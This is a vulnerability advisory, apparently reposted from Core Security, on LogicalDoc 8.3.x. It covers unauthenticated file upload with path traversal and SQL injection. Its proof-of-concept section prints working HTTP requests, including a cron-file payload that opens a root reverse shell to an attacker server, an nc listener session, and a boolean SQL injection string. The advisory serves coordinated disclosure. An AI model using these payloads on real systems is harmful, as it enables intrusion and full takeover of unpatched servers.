LogicalDoc before 8.3.3 allows SQL Injection

Overview :
LogicalDoc before 8.3.3 allows SQL Injection. LogicalDoc populates the list of available documents by querying the database. This list could be filtered by modifying some of the parameters. Some of them are not properly sanitized which could allow an authenticated attacker to perform arbitrary queries to the database.
CVE ID :CVE-2020-10365

LogicalDoc Virtual Appliance Multiple Vulnerabilities

1. Advisory Information

Title: LogicalDoc Virtual Appliance Multiple Vulnerabilities
Advisory ID: CORE-2019-004
Advisory URL: http://www.coresecurity.com/advisories/logicaldoc-virtual-appliance-multiple-vulnerabilities
Date published: 2020-03-18
Date of last update: 2020-03-17
Vendors contacted: LogicalDoc
Release mode: Coordinated release

2. Vulnerability Information

Class: Unrestricted Upload of File with Dangerous Type [CWE-434], Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) [CWE-22], SQL Injection [CWE-89]
Impact: Code execution allows privilege escalation
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2020-9423CVE-2020-10365

3. Vulnerability Description

LogicalDoc [1] is a global software company that sells an enterprise document management system (DMS) designed to provide administration and serve as a repository for an organization’s content.

Multiple vulnerabilities were found in the Virtual Appliance version, which would allow a remote unauthenticated attacker to upload arbitrary files that could lead to the execution of arbitrary commands with root privileges.

4. Vulnerable Packages

  • LogicalDoc 8.3.1
  • LogicalDoc 8.3

Other products and versions might be affected, but they were not tested.

5. Vendor Information, Solutions, and Workarounds

LogicalDoc published a patched version of the product on 2019-08-30 with the 8.3.3 release which fixes these issues.

6. Credits

These vulnerabilities were discovered and researched by Ivan Huertas from Core Security Consulting Services.

The publication of this advisory was coordinated by Pablo A. Zurro from Core Advisories Team.

7. Technical Description / Proof of Concept Code

LogicalDoc Virtual Appliance is a free virtual appliance version of the LogicalDoc Document Management tool. It is designed to be deployed inside an organization’s network infrastructure. It comes bundled with a Web Management Console for documents, messaging systems, user management, and other services.

Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the whole system. Vulnerabilities described in 7.1 and 7.2 could allow an attacker to upload arbitrary files which lead to command execution and dump data from the database.

7.1 Arbitrary file upload leading to remote command execution

[CVE-2020-9423] LogicalDoc provides a functionality to add documents. Those documents could then be used for multiple tasks, such as version control, shared among users, applying tags, etc. This functionality could be abused by an unauthenticated attacker to upload an arbitrary file in a restricted folder. This would lead to the executions of malicous commands with root privileges.

The following proof of concept demonstrates the vulnerability: Firstly, we used the mechanism called “Add Documents” to add a new document in the following path: /frontend/document. A pop-up appears where multiple files could be dragged and dropped. In the background a request to /servlet.gupld is performed. This last servlet is vulnerable to an arbitrary file upload and a path traversal, as we are able to change the path by inserting ../ characters in the name parameter of the request.

As an extra verification, we performed this exact request without providing a session cookie and trying to store the file in the /etc/cron.d/ directory. This file contained commands to execute a reverse shell to our attack server. This was confirmed so an unauthenticated attack could exploit this issue.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
POST /servlet.gupld HTTP/1.1
Host: 10.106.91.25
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------675725876718999651035521338
Content-Length: 321
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------675725876718999651035521338
Content-Disposition: form-data; name="../../../../../../../../etc/cron.d/partialPath"; filename="vgauth.conf"
Content-Type: text/html
* * * * * root /bin/bash -i >& /dev/tcp/10.106.91.24/8089 0>&1
-----------------------------675725876718999651035521338--
HTTP/1.1 200
Set-Cookie: JSESSIONID=931447C141982D63AAAD8A1E4BCB11E6; Path=/; HttpOnly
Cache-Control: no-cache
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src 'self' https://*.google.com https://*.zoho.com ; frame-ancestors *; style-src * 'unsafe-inline';
Content-Type: text/plain;charset=UTF-8
Date: Tue, 16 Jul 2019 16:47:38 GMT
Connection: close
Server: Undisclosed/8.41
Content-Length: 441
%%%INI%%%@@^^^?xml version="1.0" encoding="UTF-8"?^^^@@
@@^^^response^^^@@@@^^^files^^^@@@@^^^file^^^@@@@^^^ctype^^^@@text/html@@^^^/ctype^^^@@
@@^^^size^^^@@63@@^^^/size^^^@@
@@^^^field^^^@@../../../../../../../../etc/cron.d/partialPath-0@@^^^/field^^^@@
@@^^^name^^^@@vgauth.conf@@^^^/name^^^@@
@@^^^/file^^^@@
@@^^^/files^^^@@
@@^^^finished^^^@@ok@@^^^/finished^^^@@
@@^^^parameters^^^@@@@^^^/parameters^^^@@
@@^^^/response^^^@@
%%%END%%%

One minute after sending the request, we received the reverse connection on our server. Since the web server is running with root privileges, our reverse shell had the maximum privileges on the system.

1
2
3
4
5
6
7
8
9
[.....CONSOLE ON OUR ATTACK SERVER.....]
root@kali-burp:~# nc -nlvp 8089
listening on [any] 8089 ...
connect to [10.106.91.24] from (UNKNOWN) [10.106.91.25] 33102
bash: no job control in this shell
root@logicaldoc ~]#whoami
whoami
root
root@logicaldoc ~]#

7.2 SQL injection

[CVE-2020-10365] LogicalDoc populates the list of available documents by querying the database. This list could be filtered by modifying some of the parameters. We confirmed that some of them are not properly sanitized, which could allow an authenticated attacker to perform arbitrary queries to the database. Below is a common request to retrieve the list of documents:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
GET /data/documents.xml?locale=en&folderId=4&filename=salesfusion&max=100&indexed=&page=1 HTTP/1.1
Host: 10.106.91.25
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
If-Modified-Since: Thu, 01 Jan 1970 00:00:00 GMT
Cookie: JSESSIONID=9DBE50DF71DF092F4CB2C01EBE5E314C; ldoc-sid=d0c30aa5-9819-4c44-917e-455155d5e93a; GLog=%7B%0A%20%20%20%20trackRPC%3Afalse%0A%7D
Connection: close
HTTP/1.1 200
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src 'self' https://*.google.com https://*.zoho.com ; frame-ancestors *; style-src * 'unsafe-inline';
Content-Type: text/xml;charset=UTF-8
Content-Length: 938
Date: Tue, 16 Jul 2019 17:39:18 GMT
Connection: close
Server: Undisclosed/8.41
36044844generic1.02019-07-16T17:39:012019-07-16T17:39:012019-07-16T17:39:01734000false00false02019-07-16T04:00:00yes

Boolean-based SQL Injection is a SQL Injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result. We tampered with the filename parameter to create a valid SQL query. Below is an example of a TRUE statement:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
GET /data/documents.xml?locale=en&folderId=4&filename=salesfusion'+OR+NOT+9907%3d9907+AND+'ynwj'+LIKE+'ynwj&max=100&indexed=&page=1 HTTP/1.1
Host: 10.106.91.25
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
If-Modified-Since: Thu, 01 Jan 1970 00:00:00 GMT
Cookie: JSESSIONID=9DBE50DF71DF092F4CB2C01EBE5E314C; ldoc-sid=d0c30aa5-9819-4c44-917e-455155d5e93a; GLog=%7B%0A%20%20%20%20trackRPC%3Afalse%0A%7D
Connection: close
HTTP/1.1 200
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src 'self' https://*.google.com https://*.zoho.com ; frame-ancestors *; style-src * 'unsafe-inline';
Content-Type: text/xml;charset=UTF-8
Content-Length: 938
Date: Tue, 16 Jul 2019 18:07:36 GMT
Connection: close
Server: Undisclosed/8.41
36044844generic1.02019-07-16T17:52:502019-07-16T17:39:012019-07-16T17:39:01734001false00false02019-07-16T04:00:00yes

Below is an extract of information retrieved by sending multiple SQL queries:

1
2
3
4
5
6
7
8
9
10
11
[13:37:28] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[13:37:28] [INFO] fetching database names
[13:37:28] [INFO] fetching number of databases
[13:37:28] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:37:28] [INFO] retrieved:
[13:37:29] [INFO] fetching current database
[13:37:29] [INFO] retrieved: logicaldoc
[13:37:31] [INFO] fetching tables for database: 'logicaldoc'
[13:37:31] [INFO] fetching number of tables for database 'logicaldoc'
[13:37:31] [INFO] retrieved:

8. Report Timeline

2019-07-18 – Core Security made initial contact with LogicalDoc, including a draft advisory with two vulnerabilities.

2019-08-30 – Vulnerabilities  solved by LogicalDoc in version 8.3.3.

2020-02-26 – Applied for first CVE via MITRE website, received confirmation of application.

2020-02-28 – MITRE assigns CVE-2020-9423 to first vulnerability.

2020-03-10 – Applied for CVEs via MITRE for second vulnerability. MITRE assigns CVE-2020-10365.

2020-03-18 – Advisory published.

9. References

[1] https://www.logicaldoc.com/

10. About CoreLabs

CoreLabs, the research center of Core Security, A HelpSystems Company is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at https://www.coresecurity.com/core-labs.

11. About Core Security, A HelpSystems Company

Core Security, a HelpSystems Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@helpsystems.com.

12. Disclaimer

The contents of this advisory are copyright (c) 2020 Core Security and (c) 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

CVE ID : CVE-2020-7955 CVE-2020-7219
Facebook
Twitter
LinkedIn

Recent Posts

Follow Us

Web Application Firewall Solution